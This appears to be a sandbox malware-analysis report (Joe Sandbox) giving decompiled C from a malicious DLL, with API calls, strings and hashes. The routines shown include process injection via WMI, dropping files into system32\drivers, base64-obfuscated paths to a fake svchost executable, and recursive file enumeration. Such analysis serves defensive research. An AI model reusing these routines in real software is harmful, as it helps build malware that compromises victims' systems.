            0x10004dc8
            0x10004dcc
            0x10004dce
            0x10004dd0
            0x10004dd0
            0x10004de3
            0x10004dea
            0x10004def
            0x10004df6
            0x10004df8
            0x10004e01
            0x10004e0a
            0x10004e0a
            0x10004e0a
            0x10004e0c
            0x10004e14
            0x10004e19
            0x10004e26
            0x10004e2f
            0x10004e31
            0x10004e38
            0x10004e3a
            0x10004e40
            0x10004e40
            0x10004e3c
            0x10004e3c
            0x10004e3c
            0x10004e42
            0x10004e4f
            0x10004e51
            0x10004e57
            0x10004e5d
            0x10004e5d
            0x10004e59
            0x10004e59
            0x10004e59
            0x10004e5f
            0x10004e67
            0x10004e6e
            0x10004e71
            0x10004e76
            0x10004e78
            0x10004e7d
            0x10004e7d
            0x10004e80
            0x10004e83
            0x10004e89
            0x10004e8b
            0x10004e8b
            0x10004e93
            0x10004e96
            0x10004fff
            0x10004fff
            0x10005000
            0x10005009
            0x1000500f
            0x10005011
            0x10005017
            0x1000501a
            0x10005020
            0x10005023
            0x10005029
            0x1000502c
            0x10005035
            0x10005044
            0x1000504c
            0x10004e9c
            0x10004e9c
            0x10004ea2
            0x10004ea8
            0x10004ea9
            0x10004eae
            0x10004eaf
            0x10004eb1
            0x10004eb3
            0x10004ebb
            0x00000000
            0x00000000
            0x10004ec5
            0x10004ecb
            0x10004ed1
            0x10004ed3
            0x10004edc
            0x10004ee8
            0x10004eeb
            0x10004efd
            0x10004f00
            0x10004f04
            0x10004f08
            0x10004f12
            0x10004f15
            0x10004f18
            0x10004f23
            0x10004f26
            0x10004f29
            0x10004f2a
            0x10004f2b
            0x10004f2c
            0x10004f31
            0x10004f32
            0x10004f37
            0x10004f39
            0x10004f42
            0x10004f4b
            0x10004f4b
            0x10004f44
            0x10004f44
            0x10004f44
            0x10004f4d
            0x10004f52
            0x10004f57
            0x10004f5d
            0x10004f62
            0x10004f64
            0x10004f69
            0x10004f69
            0x10004f6c
            0x10004f76
            0x10004f7c
            0x10004f7e
            0x10004f7f
            0x10004f8c
            0x10004f92
            0x10004f95
            0x10004f95
            0x10004f97
            0x10004f9c
            0x10004f9d
            0x10004fa2
            0x10004fa4
            0x10004fad
            0x10004fb6
            0x10004fb6
            0x10004faf
            0x10004faf
            0x10004faf
            0x10004fb8
            0x10004fc0
            0x10004fc5
            0x10004fcb
            0x10004fd0
            0x10004fd2
            0x10004fd7
            0x10004fd7
            0x10004fe6
            0x10004feb
            0x10004ff1
            0x10004ff2
            0x10004ff2
            0x10004f7f
            0x10004ff6
            0x10004ff9
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x10004ff9
            0x00000000
            0x10004ea2

            APIs
            • VariantInit.OLEAUT32(00000000), ref: 10004EC5
            • VariantInit.OLEAUT32(?), ref: 10004ECB
            • VariantInit.OLEAUT32(000000FF), ref: 10004ED1
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
            • API String ID: 1927566239-2685825574
            • Opcode ID: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
            • Instruction ID: 685215bc3e39be9e7018d3cf9a0ce008db6110164ca837be315af6ad884bf42e
            • Opcode Fuzzy Hash: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
            • Instruction Fuzzy Hash: 7AA15BB5900209AFEB04DF94CC81DEEBBBCEF48394F104569F615AB295CB31AE45CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 56%
            			E1000570F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
            				void _v67;
            				char _v68;
            				void _v327;
            				char _v328;
            				char _v587;
            				char _v588;
            				void _v4683;
            				signed char _v4684;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t47;
            				void* _t48;
            				void* _t49;
            				signed int _t52;
            				signed int _t56;
            				void* _t58;
            				void* _t67;
            				void* _t71;
            				void* _t79;
            
            				_t79 = __eflags;
            				_t60 = __edx;
            				_t51 = __ecx;
            				E1000CD20(0x1248, __ecx);
            				E100051D3(_t51, __edx, _t79, __fp0);
            				_v68 = _v68 & 0x00000000;
            				_t52 = 0xf;
            				memset( &_v67, 0, _t52 << 2);
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v68, "%s\\%s", 0x100165a4, 0x100165a8);
            				_v4684 = _v4684 & 0x00000000;
            				memset( &_v4683, 0, 0x3ff << 2);
            				asm("stosw");
            				asm("stosb");
            				E10005318(0, _t79,  &_v4684);
            				_v328 = _v328 & 0x00000000;
            				_t56 = 0x40;
            				_v588 = _v588 & 0x00000000;
            				memset( &_v327, 0, _t56 << 2);
            				asm("stosw");
            				asm("stosb");
            				_t58 = 0x40;
            				_t67 =  &_v587;
            				memset(_t67, 0, 0 << 2);
            				_t68 = _t67 + _t58;
            				asm("stosw");
            				asm("stosb");
            				wsprintfA( &_v328, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
            				wsprintfA( &_v588, "c:\\windows\\system32\\drivers\\%s\\%s", 0x100165a4, 0x100165a8);
            				0x10038f08( &_v328, 0);
            				asm("insd");
            				E1000443D( &_v4684, 0x100165a4, 0, _t60,  &_v4684,  &_v588);
            				_push(L"Win32_process");
            				_push(L"ROOT\\CIMv2");
            				 *0x10015fd4 = 0;
            				_t47 = E10004D36(0x100165a4, 0, _t60, _t67 + _t58, 0, _t79, __fp0);
            				_t80 = _t47;
            				if(_t47 != 0) {
            					_push(_t47);
            					_push(0);
            					_t47 = E10029564(_t47, _t60, _t68, _t80, _t71, 0x1f0fff);
            					 *0x10015ff4 = _t47;
            					if(_t47 != 0) {
            						_t48 =  *0x10015fd8; // 0x0
            						 *_t48 = 0;
            						_t49 = CreateThread(0, 0, E10005620,  *0x10015fd8, 0, 0);
            						 *0x10015fd4 =  *0x10015fd4 + 1;
            						return _t49;
            					}
            				}
            				return _t47;
            			}
























            0x1000570f
            0x1000570f
            0x1000570f
            0x10005717
            0x1000571f
            0x10005724
            0x1000572a
            0x10005736
            0x10005738
            0x10005744
            0x1000574f
            0x10005751
            0x10005765
            0x10005767
            0x10005769
            0x10005771
            0x10005776
            0x1000577f
            0x10005788
            0x1000578f
            0x10005791
            0x10005793
            0x10005798
            0x10005799
            0x1000579f
            0x1000579f
            0x100057a1
            0x100057a3
            0x100057b1
            0x100057c5
            0x100057d4
            0x100057d9
            0x100057e8
            0x100057ed
            0x100057f2
            0x100057f7
            0x100057fd
            0x10005805
            0x10005807
            0x10005809
            0x1000580a
            0x10005811
            0x10005818
            0x1000581d
            0x1000581f
            0x10005826
            0x10005835
            0x1000583b
            0x00000000
            0x1000583b
            0x1000581d
            0x10005845

            APIs
            • wsprintfA.USER32 ref: 1000574F
            • wsprintfA.USER32 ref: 100057B1
            • wsprintfA.USER32 ref: 100057C5
            • PrintFile.ABC(?,?,?,00000000,?,?,?,?,?,?,?,10016AE0,00000000,00080000,?,1000721D), ref: 100057E8
            • CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000), ref: 10005835
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: wsprintf$CreateFilePrintThread
            • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
            • API String ID: 1788855648-1421401311
            • Opcode ID: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
            • Instruction ID: e048b07faf1ac040a4fa8706c71f0fbcae81103e39d27b5d28515d44bb65aaec
            • Opcode Fuzzy Hash: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
            • Instruction Fuzzy Hash: ED31A773910238BBEB21D7A4CC44FCF7B6DEB08746F1405A2F708FA051DB71AA858A91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 16%
            			E10004351(void* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
            				void _v263;
            				char _v264;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t21;
            				void* _t23;
            				void* _t27;
            				signed int _t29;
            				void* _t31;
            				char* _t38;
            				void* _t40;
            				void* _t41;
            				signed int _t43;
            				void* _t48;
            				intOrPtr* _t49;
            				CHAR** _t52;
            				void* _t54;
            				intOrPtr* _t55;
            
            				_t60 = __fp0;
            				_t47 = __edx;
            				_t39 = __ecx;
            				_t52 = "cmd.exe";
            				0x10032ab5(__eax, _a8, _t52);
            				_t59 = __eax;
            				if(__eax == 0) {
            					__eflags = _a4 - E100267D4(__eax, __ecx, __edx, _t48, _t52, __eflags, __fp0);
            					if(__eflags != 0) {
            						E10004318(_t19, __ecx, _a4);
            						 *_t55 = 0x7d0;
            						Sleep(??);
            						_t38 = "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==";
            						_t21 = E10001000(_t39, __eflags, __fp0, _t38);
            						_pop(_t49);
            						0x10041fa9();
            						_pop(_t40);
            						 *_t49(_t21);
            						_t23 = E10001000(_t40, __eflags, __fp0, "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==");
            						_t41 = 1;
            						 *_t38(E100271E2(_t24, _t38, _t41, _t47), E10001000(_t41, __eflags, __fp0, _t38), _t23);
            						_t27 =  *_t49();
            						Sleep(0x3e8);
            						_t29 = E100290F2(_t27, _t38, _t54, _a8, _a8) & 0x00000085;
            						 *(_t55 + _t29 * 2 - 0x80) =  *(_t55 + _t29 * 2 - 0x80) << 0xa5;
            						asm("cld");
            						asm("invalid");
            						 *_t29 =  *_t29 + 1;
            						__eflags =  *_t29;
            						_t43 = 0x40;
            						__eflags = 0;
            						_t31 = memset( &_v263, 0, _t43 << 2);
            						asm("stosw");
            						asm("stosb");
            						0x10041377();
            						wsprintfA( &_v264, "%s.%d", _a8, _t31);
            						return  *_t38(_a8,  &_v264, 1);
            					}
            					_push("self");
            					L4:
            					_push(0);
            					return L10004139(_t39, _t47, _t59, _t60);
            				}
            				_push(_t52);
            				goto L4;
            			}























            0x10004351
            0x10004351
            0x10004351
            0x1000435c
            0x10004367
            0x1000436c
            0x1000436e
            0x10004379
            0x1000437c
            0x10004394
            0x1000439f
            0x100043a6
            0x100043a8
            0x100043ae
            0x100043b3
            0x100043b4
            0x100043b9
            0x100043bb
            0x100043c4
            0x100043c9
            0x100043d9
            0x100043de
            0x100043e5
            0x100043ef
            0x100043f1
            0x100043f6
            0x100043f7
            0x100043f9
            0x100043f9
            0x100043fd
            0x100043fe
            0x10004406
            0x10004408
            0x1000440a
            0x1000440b
            0x10004421
            0x00000000
            0x10004436
            0x1000437e
            0x10004383
            0x10004383
            0x00000000
            0x1000438b
            0x10004370
            0x00000000

            APIs
            • Sleep.KERNEL32(?,00000000,00000000,?,cmd.exe,C:\Users\user\Desktop\12071239,751443E0,00000000), ref: 100043A6
            • Sleep.KERNEL32(000003E8), ref: 100043E5
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep
            • String ID: C:\Users\user\Desktop\12071239$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$cmd.exe$self
            • API String ID: 3472027048-4004553475
            • Opcode ID: ce743051b1794b362fe0f2b971c97cdc6726bc3503be27e5a92855a4779c6d50
            • Instruction ID: b27527e00d161eb54cfb38a31ab8197fa4e33b6488c85d147b80e3c5571d821e
            • Opcode Fuzzy Hash: ce743051b1794b362fe0f2b971c97cdc6726bc3503be27e5a92855a4779c6d50
            • Instruction Fuzzy Hash: CF0126B64043547AFA11B778EC86F8F3B4CDF452E1F110422F94469089CEB9AA808665
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E10005CF7(intOrPtr _a4, intOrPtr _a8) {
            				char _v8;
            				void _v267;
            				char _v268;
            				void* _t20;
            				signed int _t26;
            				signed int _t30;
            
            				_t30 = 0x40;
            				_v268 = 0;
            				memset( &_v267, 0, _t30 << 2);
            				asm("stosw");
            				asm("stosb");
            				E10003EF4( &_v268, "%s\\lang.ini", "C:\\Users\\alfons\\Desktop");
            				if(E10003F72( &_v268) != 0) {
            					_v8 = 0;
            					_t20 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
            					_t36 = _t20;
            					if(_t20 == 0xffffffff) {
            						goto L1;
            					}
            					E10004035(_t36, _a4, _a8,  &_v8, 0);
            					E10003F92(_t36);
            					if(E10003F7D(_a4, "http://") == 0) {
            						goto L1;
            					}
            					_t26 = E10003F7D(_a4, "search");
            					asm("sbb eax, eax");
            					return  ~_t26 + 1;
            				}
            				L1:
            				return 0;
            			}









            0x10005d07
            0x10005d10
            0x10005d1b
            0x10005d1d
            0x10005d1f
            0x10005d2c
            0x10005d42
            0x10005d5e
            0x10005d61
            0x10005d66
            0x10005d6e
            0x00000000
            0x00000000
            0x10005d7c
            0x10005d82
            0x10005d99
            0x00000000
            0x00000000
            0x10005da3
            0x10005dab
            0x00000000
            0x10005dae
            0x10005d44
            0x00000000

            APIs
              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
            • String ID: %s\lang.ini$C:\Users\user\Desktop$http://$search
            • API String ID: 1721638100-3849684823
            • Opcode ID: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
            • Instruction ID: 8c54ec75ac406b03aa883dad07c62b5b690cd8483bd5bdce465cc98b2d904575
            • Opcode Fuzzy Hash: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
            • Instruction Fuzzy Hash: 971106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA71AFC44A60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E10005C4C(intOrPtr _a4, intOrPtr _a8) {
            				char _v8;
            				void _v267;
            				char _v268;
            				void* _t19;
            				signed int _t24;
            				signed int _t28;
            
            				_t28 = 0x40;
            				_v268 = 0;
            				memset( &_v267, 0, _t28 << 2);
            				asm("stosw");
            				asm("stosb");
            				E10003EF4( &_v268, "%s\\lang.ini", "C:\\Users\\alfons\\Desktop");
            				if(E10003F72( &_v268) != 0) {
            					_v8 = 0;
            					_t19 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
            					_t32 = _t19;
            					if(_t19 == 0xffffffff) {
            						goto L1;
            					}
            					E10004035(_t32, _a4, _a8,  &_v8, 0);
            					E10003F92(_t32);
            					_t24 = E10003F7D(_a4, "http://");
            					asm("sbb eax, eax");
            					return  ~( ~_t24);
            				}
            				L1:
            				return 0;
            			}









            0x10005c5c
            0x10005c65
            0x10005c70
            0x10005c72
            0x10005c74
            0x10005c81
            0x10005c97
            0x10005cb3
            0x10005cb6
            0x10005cbb
            0x10005cc3
            0x00000000
            0x00000000
            0x10005cd1
            0x10005cd7
            0x10005ce4
            0x10005cee
            0x00000000
            0x10005cf0
            0x10005c99
            0x00000000

            APIs
              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
            • String ID: %s\lang.ini$C:\Users\user\Desktop$http://
            • API String ID: 1721638100-2151592823
            • Opcode ID: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
            • Instruction ID: 384da5e59b1e856c45bbe6372d81ece75bf9070c03a2386a6f56754dbd155cb7
            • Opcode Fuzzy Hash: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
            • Instruction Fuzzy Hash: 601104769041197EFB21DAA4CC42FDB776CDB143C4F0085B1FA48B6080EA71AF844660
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E10004630(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				char _v8;
            				intOrPtr _v12;
            				char _v16;
            				char _v275;
            				char _v276;
            				void _v535;
            				char _v536;
            				char _v812;
            				signed char _v856;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				char* _t47;
            				void* _t53;
            				intOrPtr _t57;
            				void* _t59;
            				signed int _t66;
            				signed int _t68;
            				void* _t70;
            				void* _t73;
            				void* _t74;
            				void* _t75;
            				void* _t77;
            				void* _t78;
            				void* _t80;
            				void* _t87;
            
            				_t87 = __fp0;
            				_t70 = __edx;
            				_t66 = 0x40;
            				_v536 = 0;
            				memset( &_v535, 0, _t66 << 2);
            				asm("stosw");
            				asm("stosb");
            				E1000CD0E(0,  &_v536);
            				E1000CD08(0,  &_v536);
            				_t80 = _t78 + 0x1c;
            				_t47 =  &_v536;
            				0x10031a18(_t47,  &_v856, "\\*.*", _a4);
            				asm("insd");
            				_v12 = _t47;
            				if(_t47 != 0xffffffff) {
            					_push(_t75);
            					do {
            						_t68 = 0x40;
            						_t73 =  &_v275;
            						_v276 = 0;
            						memset(_t73, 0, _t68 << 2);
            						_t74 = _t73 + _t68;
            						asm("stosw");
            						asm("stosb");
            						wsprintfA( &_v276, "%s\\%s", _a4,  &_v812);
            						_push(_a12);
            						_t53 = E1000CD02(0, _t75);
            						_t80 = _t80 + 0x20;
            						_t75 = _t77 + _t53 - 0x10f;
            						if((_v856 & 0x00000010) == 0) {
            							_v16 = 0;
            							_v8 = 0;
            							_t57 = E10004564(0, _t70, __eflags, _t87,  &_v8,  &_v276,  &_v16);
            							_t80 = _t80 + 0xc;
            							__eflags = _t57;
            							if(__eflags == 0) {
            								goto L9;
            							}
            							__eflags = _v8;
            							if(__eflags == 0) {
            								goto L9;
            							}
            							E1000CBDC(_a8, _t75, _v8, _v16);
            							E1000CCA8(0, 0, _t70, _t74, _t75, _t77, __eflags, _t87, _v8);
            							L8:
            							_t80 = _t80 + 0x14;
            							goto L9;
            						}
            						_t85 = _v812 - 0x2e;
            						if(_v812 == 0x2e) {
            							goto L9;
            						}
            						E1000CBF7(_a8, _t75);
            						E10004630(_t70, _t85, _t87,  &_v276, _a8, _a12);
            						goto L8;
            						L9:
            						_push( &_v856);
            						_push(_v12);
            						_t59 = E100272CF(0, 0, _t70, _t74, _t75, _t77, _t85);
            						asm("clc");
            					} while (_t59 != 0);
            					0x10035c27(_t74, _v12);
            					return _t59;
            				}
            				return _t47;
            			}






























            0x10004630
            0x10004630
            0x1000463f
            0x10004648
            0x1000464e
            0x10004653
            0x10004655
            0x1000465d
            0x1000466e
            0x10004673
            0x1000467d
            0x10004684
            0x10004689
            0x1000468d
            0x10004690
            0x10004696
            0x10004697
            0x1000469b
            0x1000469c
            0x100046a2
            0x100046a8
            0x100046a8
            0x100046aa
            0x100046ac
            0x100046c3
            0x100046c9
            0x100046cc
            0x100046d1
            0x100046d4
            0x100046e2
            0x1000470d
            0x1000471c
            0x1000471f
            0x10004724
            0x10004727
            0x10004729
            0x00000000
            0x00000000
            0x1000472b
            0x1000472e
            0x00000000
            0x00000000
            0x1000473a
            0x10004742
            0x10004747
            0x10004747
            0x00000000
            0x10004747
            0x100046e4
            0x100046eb
            0x00000000
            0x00000000
            0x100046f1
            0x10004703
            0x00000000
            0x1000474a
            0x10004750
            0x10004751
            0x10004754
            0x10004759
            0x1000475a
            0x10004766
            0x00000000
            0x1000476b
            0x1000476f

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: wsprintf
            • String ID: %s\%s$.$\*.*
            • API String ID: 2111968516-2210278135
            • Opcode ID: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
            • Instruction ID: d326f81f7ac9fe77124f283db77ffe5160f1302aaf38353be2e3603f90d865f5
            • Opcode Fuzzy Hash: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
            • Instruction Fuzzy Hash: F0316FB6C0025CBAEF12DFA4CC45EDE7B7CEB09280F1104A6F618A6051DB319B989B51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E10005F98(void* __ecx, intOrPtr _a4) {
            				char _v8;
            				char _v268;
            				void* __esi;
            				void* _t15;
            
            				E10003EF4( &_v268, "%s\\lang.ini", "C:\\Users\\alfons\\Desktop");
            				_v8 = 0;
            				_t19 = E10004015( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
            				if(_t10 != 0xffffffff) {
            					_push(0);
            					E10003F9D(_t19, _a4, E1000CD02(__ecx, 0), _a4,  &_v8);
            					E10003F92(_t19);
            					_t15 = 1;
            					return _t15;
            				}
            				return 0;
            			}







            0x10005fb4
            0x10005fd1
            0x10005fd9
            0x10005fe1
            0x10005fea
            0x10005ffa
            0x10006000
            0x1000600a
            0x00000000
            0x1000600a
            0x00000000

            APIs
            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FD4
              • Part of subcall function 10004015: CreateFileA.KERNEL32(00000080,00000003,00000000,00000000,80000000,?,10005CBB,?,10005CBB,?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 1000402D
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CreateTimer$Concurrency::details::platform::__FileQueue
            • String ID: %s\lang.ini$C:\Users\user\Desktop
            • API String ID: 3486561800-3123256004
            • Opcode ID: 886d66d81c6c89a48981e832452a30d3b73e07841e03f775c6b280e2ad27018c
            • Instruction ID: fdba07edcaf4c5d9f8880ce60f62221f71be709bcd2a0296a9a45e1c288e65da
            • Opcode Fuzzy Hash: 886d66d81c6c89a48981e832452a30d3b73e07841e03f775c6b280e2ad27018c
            • Instruction Fuzzy Hash: A5F0F6768011187AE621D6659C0BFEF3E6CDF857E0F104121FA48E90C5EB75AAC196E1
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:11.6%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:50
            Total number of Limit Nodes:3
            execution_graph 357 30b152b GetProcAddress 358 30b002a 359 30b002c 358->359 360 30b00c3 359->360 366 30b0047 359->366 363 30b0056 VirtualFree 363->360 367 30b004b 366->367 368 30b003b 367->368 369 30b0056 VirtualFree 367->369 370 30b0063 2 API calls 367->370 368->363 372 30b0063 368->372 369->368 370->369 373 30b0067 372->373 374 30b006b VirtualAlloc 373->374 375 30b00c3 373->375 374->375 376 30b0084 374->376 375->363 377 30b00b5 VirtualFree 376->377 377->375 378 30b1509 LoadLibraryA 335 30b0063 336 30b0067 335->336 337 30b006b VirtualAlloc 336->337 338 30b00c3 336->338 337->338 339 30b0084 337->339 340 30b00b5 VirtualFree 339->340 340->338 379 30b0e83 380 30b0e8d LoadLibraryA 379->380 382 30b0ea5 380->382 381 30b0eab GetProcAddress 381->382 382->380 382->381 383 30b0ec8 382->383 341 30b0cb1 343 30b0cdd 341->343 344 30b0d0d 343->344 345 30b0d3b VirtualAlloc 344->345 347 30b0d6a 345->347 346 30b0e0c MessageBoxA ExitProcess 347->346 348 30b0e26 347->348 350 30b0dab 347->350 349 30b0e54 VirtualFree 348->349 351 30b0dbb wsprintfA 350->351 353 30b0dcb 350->353 351->353 353->346 384 30b0c61 386 30b0d5d 384->386 385 30b0e0c MessageBoxA ExitProcess 386->385 387 30b0e26 386->387 389 30b0dab 386->389 388 30b0e54 VirtualFree 387->388 390 30b0df0 wsprintfA 389->390 391 30b0dcb 389->391 390->391 391->385 354 